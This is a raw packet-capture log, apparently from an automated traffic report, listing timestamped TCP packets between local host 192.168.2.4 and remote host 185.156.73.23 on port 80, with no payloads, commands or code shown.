Dec 20, 2024 16:13:31.139332056 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.139472008 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.139523029 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.143476009 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.143544912 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.143620968 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.143671989 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.147608995 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.147680998 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.148267984 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.148323059 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.151669979 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.151743889 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.151854038 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.151894093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.155884981 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.155977964 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.156042099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.156084061 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.160033941 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.160118103 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.259058952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.259212971 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.259499073 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.259547949 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.261723042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.261775017 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.261823893 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.261868954 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.265202999 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.265255928 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.265785933 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.265831947 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.269355059 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.269416094 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.269509077 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.269556046 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.273503065 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.273557901 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.273802996 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.273847103 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.277792931 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.277843952 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.277934074 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.277976036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.305162907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.305265903 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.305273056 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.305310965 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.307343960 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.307393074 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.374589920 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.374608040 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.374650002 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.374722004 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.374741077 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.374741077 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.374778032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.378180981 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.378240108 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.378467083 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.378515005 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.381714106 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.381764889 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.381928921 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.381973982 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.388725042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.388739109 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.388787985 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.390701056 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.390753984 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.390940905 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.390988111 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.395061970 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.395114899 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.423006058 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.423053026 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.423145056 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.423171997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.425309896 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.425321102 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.425369024 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.491558075 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.491667986 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.491700888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.491744041 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.493453026 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.493520975 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.493647099 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.493686914 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.496833086 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.496911049 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.497097015 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.497140884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.500942945 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.501008987 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.501307964 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.501355886 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.505096912 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.505151987 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.505260944 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.505297899 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.509116888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.509303093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.509757042 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.509835958 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.513428926 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.513488054 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.543029070 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.543122053 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.543148994 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.543180943 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.544930935 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.544948101 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.544985056 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.544998884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.547667027 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.547728062 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.611033916 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.611089945 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.611190081 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.611270905 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.612922907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.612968922 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.613078117 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.613121033 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.616832018 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.616877079 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.617341995 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.617389917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.620732069 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.620799065 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.620872021 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.620917082 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.624701977 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:31.624742985 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.652422905 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:31.772046089 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.589154005 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.589282036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.589445114 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.590153933 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.590872049 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.590919971 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.591140032 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.591185093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.594643116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.594697952 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.595985889 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.596070051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.596185923 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.596229076 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.599817038 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.599874973 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.600019932 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.600063086 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.603529930 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.603588104 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.603658915 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.603707075 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.607450962 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.607508898 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.607561111 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.607604027 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.708513975 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.708636045 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.708724976 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.710275888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.710331917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.710410118 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.710551977 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.713179111 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.713229895 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.713983059 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.714027882 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.716921091 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.716969967 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.717082977 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.717124939 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.720823050 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.720875025 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.721007109 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.721051931 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.724534035 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.724585056 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.724709988 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.724750996 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.728221893 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.728276968 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.728832960 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.728905916 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.732108116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.732217073 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.732570887 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.732628107 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.735948086 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.736036062 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.736212015 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.736263037 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.739670038 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.739737988 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.739789009 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.739891052 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.827640057 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.827759981 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.827872992 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.827923059 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.829269886 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.829324961 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.829839945 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.829890013 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.833071947 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.833127975 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.833455086 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.833512068 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.836806059 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.836874962 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.837008953 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.837059975 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.840689898 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.840754032 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.841169119 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.841222048 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.844492912 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.844542027 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.844614029 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.844660997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.848182917 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.848247051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.848414898 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.848463058 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.851907015 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.851957083 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.852029085 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.852073908 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.855827093 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.855878115 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.856384039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.856429100 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.859402895 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.859457016 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.946197033 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.946259022 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.946348906 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.946386099 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.947978020 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.948023081 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.948149920 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.948193073 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.951809883 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.951869965 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.953176022 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.953226089 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.953342915 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.953383923 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.957029104 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.957144976 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.957715988 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.957767010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.960748911 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.960789919 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.961090088 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.961127996 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.964514971 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.964579105 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.964637995 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.964689016 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.968031883 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.968087912 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:33.968370914 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:33.968496084 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.093297005 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.093430996 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.093436956 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.093512058 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.095495939 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.095556021 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.095774889 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.095824003 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.098824024 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.098879099 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.099006891 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.099046946 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.102248907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.102313042 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.102571011 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.102746010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.105585098 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.105648994 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.105741024 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.105791092 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.109178066 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.109261036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.109334946 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.109390020 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.112603903 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.112684011 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.112768888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.112826109 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.116002083 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.116070986 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.116143942 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.116195917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.118212938 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.118283987 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.118377924 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.118433952 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.121685028 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.121752977 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.121829987 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.121876955 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.125181913 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.125250101 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.125365973 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.125415087 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.213366032 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.213455915 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.213521004 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.213826895 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.216670036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.216732025 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.217339039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.217394114 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.219841957 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.219899893 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.220312119 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.220366001 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.221966982 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.222023010 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.222121000 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.222168922 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.225363970 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.225438118 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.225537062 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.225584030 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.228996038 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.229079008 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.229140043 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:13:34.229275942 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:13:34.232552052 CET	80	49736	185.156.73.23	192.168.2.4
